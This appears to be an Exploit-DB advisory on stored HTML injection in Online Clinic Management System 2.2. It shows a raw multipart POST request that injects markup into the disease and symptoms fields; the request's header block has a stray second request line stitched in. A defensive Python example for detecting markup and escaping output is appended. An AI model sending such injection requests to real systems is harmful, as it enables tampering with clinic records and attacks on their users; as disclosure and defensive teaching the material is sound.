Online Clinic Management System 2.2 – HTML Injection

  • Author: Cemal Cihad ÇİFTÇİ
    Date: 2019-12-04
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/47741/
  • # Exploit Title: Online Clinic Management System 2.2 - HTML Injection
    # Date: 2019-11-29
    # Exploit Author: Cemal Cihad ÇİFTÇİ
    # Vendor Homepage: https://bigprof.com
    # Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
    # Software : Online Clinic Management System
    # Version : 2.2
    # Vulnerability Type : HTML Injection
    # Vulnerability : HTML Injection
    
    # HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini,
    # in the add disease symptom, patient and appointment sections.
    # payload: <b><i>asd</i></b>
    
    # HTTP POST request
    
    POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
    Host: 10.10.10.160
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
    POST /clinic/disease_symptoms_view.php HTTP/1.1
    Host: 10.10.10.160
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------325041947016922
    Content-Length: 1501
    Origin: http://10.10.10.160
    Connection: close
    Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
    Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
    Upgrade-Insecure-Requests: 1
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="current_view"
    
    DV
    -----------------------------325041947016922
    Content-Disposition: form-data; name="SortField"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="SelectedID"
    
    1
    -----------------------------325041947016922
    Content-Disposition: form-data; name="SelectedField"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="SortDirection"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="FirstRecord"
    
    1
    -----------------------------325041947016922
    Content-Disposition: form-data; name="NoDV"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="PrintDV"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="DisplayRecords"
    
    all
    -----------------------------325041947016922
    Content-Disposition: form-data; name="disease"
    
    <b><i>asd</i></b>
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="symptoms"
    
    <b><i>asd</i></b>
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="reference"
    
    -----------------------------325041947016922
    Content-Disposition: form-data; name="update_x"
    
    1
    -----------------------------325041947016922
    Content-Disposition: form-data; name="SearchString"
    
    -----------------------------325041947016922--
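
An added example, not part of the original advisory and not AppGini code: it parses a multipart/form-data body shaped like the request above, reports which fields carry HTML markup, and shows the encoded form a stored value should take when it is echoed into a page. The function names and the trimmed sample field set are constructed for illustration.

```python
import html
import re
from email import message_from_bytes

# Constructed sample: a trimmed set of fields in the shape of the request above.
BOUNDARY = "---------------------------325041947016922"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY
SAMPLE_FIELDS = [("SelectedID", "1"), ("disease", "<b><i>asd</i></b>"),
                 ("symptoms", "<b><i>asd</i></b>"), ("reference", "")]

# Anything that would parse as an opening, closing or declaration tag.
MARKUP = re.compile(r"<\s*/?\s*[A-Za-z!][^>]*>")


def build_body(fields, boundary=BOUNDARY):
    """Serialize (name, value) pairs as multipart/form-data (sample input only)."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
             f"\r\n\r\n{value}\r\n" for name, value in fields]
    return ("".join(parts) + f"--{boundary}--\r\n").encode("utf-8")


def parse_form(content_type, body):
    """Return {field name: text value} for a multipart/form-data request body."""
    msg = message_from_bytes(
        b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body)
    fields = {}
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_param("name", header="content-disposition")
        if name is not None:
            raw = part.get_payload(decode=True) or b""
            fields[name] = raw.decode("utf-8", "replace")
    return fields


def markup_fields(fields):
    """Names of fields whose submitted value contains HTML markup."""
    return sorted(n for n, v in fields.items() if MARKUP.search(v))


def render_cell(value):
    """Encode a stored value for an HTML text or attribute context."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    form = parse_form(CONTENT_TYPE, build_body(SAMPLE_FIELDS))
    for field in markup_fields(form):
        print(field, "->", render_cell(form[field]))
```

Flagging markup on input is a detection aid; the encoding step at output is what stops the stored value from being rendered as HTML.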